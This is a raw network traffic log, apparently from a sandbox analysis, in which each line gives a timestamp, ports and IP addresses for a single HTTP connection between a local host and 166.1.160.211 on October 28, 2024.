                                                                                                                                                              Oct 28, 2024 19:46:18.167664051 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.167697906 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.167711020 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.167731047 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.167788982 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.168251991 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.168299913 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.168332100 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.168349981 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.168365955 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.168401003 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.168420076 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.168435097 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.168468952 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.168492079 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.168503046 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.168536901 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.168570042 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.169236898 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.169272900 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.169282913 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.169307947 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.169342041 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.169357061 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.169409990 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.169444084 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.169461012 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.169478893 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.169532061 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.170036077 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.170070887 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.170104980 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.170120001 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.170140028 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.170180082 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.170192003 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.170214891 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.170248032 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.170269966 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.170285940 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.170336008 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.170902967 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.170939922 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.170974970 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.170994043 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.171009064 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.171042919 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.171065092 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.171077967 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.171133995 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.171303988 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.191751957 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.192020893 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.192105055 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.208785057 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.209069014 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.209120035 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.209130049 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.209155083 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.209188938 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.209214926 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.209224939 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.209280968 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.209405899 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.209441900 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.209476948 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.209511995 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.209513903 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.209547997 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.209564924 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.209577084 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.209625006 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.210139990 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.210170031 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.210203886 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.210218906 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.210238934 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.210274935 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.210305929 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.210309982 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.210345030 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.210365057 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.210935116 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.210983992 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.210988045 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.211024046 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.211074114 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.211076021 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.211108923 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.211143017 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.211157084 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.211862087 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.211896896 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.211916924 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.211930990 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.211966991 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.212002039 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.212002993 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.212037086 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.212059021 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.212070942 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.212115049 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.212815046 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.212851048 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.212886095 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.212903976 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.212920904 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.212954044 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.212975979 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.212989092 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.213021994 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.213042974 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.213660002 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.213711977 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.213723898 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.213747978 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.213782072 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.213802099 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.213814020 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.213849068 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.213869095 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.213882923 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.213934898 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.214596987 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.214632988 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.214667082 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.214692116 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.214701891 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.214735031 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.214756966 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.214770079 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.214801073 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.214824915 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.214835882 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.214890003 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.215519905 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.215555906 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.215589046 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.215606928 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.215624094 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.215658903 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.215687037 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.215694904 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.215729952 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.215759039 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.216408968 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.216444969 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.216464043 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.216480017 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.216514111 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.216537952 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.216548920 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.216584921 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.216603994 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.216619968 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.216674089 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.217179060 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.217215061 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.217242956 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.217262983 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.217292070 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.217325926 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.217341900 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.217360020 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.217394114 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.217422962 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.217427969 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.217462063 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.217478991 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.217495918 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.217549086 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.218131065 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.218175888 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.218209982 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.218223095 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.218244076 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.218278885 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.218296051 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.218314886 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.218348026 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.218362093 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.218383074 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.218420029 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.218436003 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.219089985 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.219141960 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.219146013 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.219176054 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.219225883 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.219244957 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.219261885 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.219296932 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.219322920 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.219350100 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.219383955 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.219400883 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.219419003 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.219451904 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.219466925 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.220098019 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.220134020 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.220149994 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.220168114 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.220202923 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.220221996 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.220237970 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.220273972 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.220292091 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.220309019 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.220344067 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.220364094 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.220381021 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.220431089 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.220935106 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.221179962 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.221215963 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.221231937 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.221252918 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.221287966 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.221307039 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.221323013 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.221357107 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.221380949 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.221391916 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.221426964 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.221446037 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.221462011 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.221509933 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.222110033 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.222146034 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.222182035 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.222198009 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.222218037 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.222254038 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.222270012 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.222289085 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.222325087 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.222341061 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.266160011 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.268877029 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.277035952 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.277120113 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.277154922 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.277179956 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.277354002 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.277389050 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.277407885 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.277422905 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.277478933 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.277489901 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.277553082 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.277587891 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.277604103 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.277621031 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.277657032 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.277678013 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.277692080 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.277738094 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.278162003 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.278197050 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.278250933 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.278250933 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.278281927 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.278332949 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.278564930 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.278599024 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.278633118 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.278650045 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.278666973 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.278701067 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.278717995 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.278737068 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.278772116 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.278786898 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.278801918 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.278851032 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.279367924 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.279403925 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.279454947 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.279454947 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.279489994 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.279540062 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.279542923 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.279572964 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.279611111 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.279628038 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.280019999 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.280064106 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.280067921 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.280097961 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.280133009 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.280150890 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.280165911 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.280200958 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.280226946 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.280235052 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.280272007 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.280291080 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.280304909 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.280355930 CET4972680192.168.2.16166.1.160.211
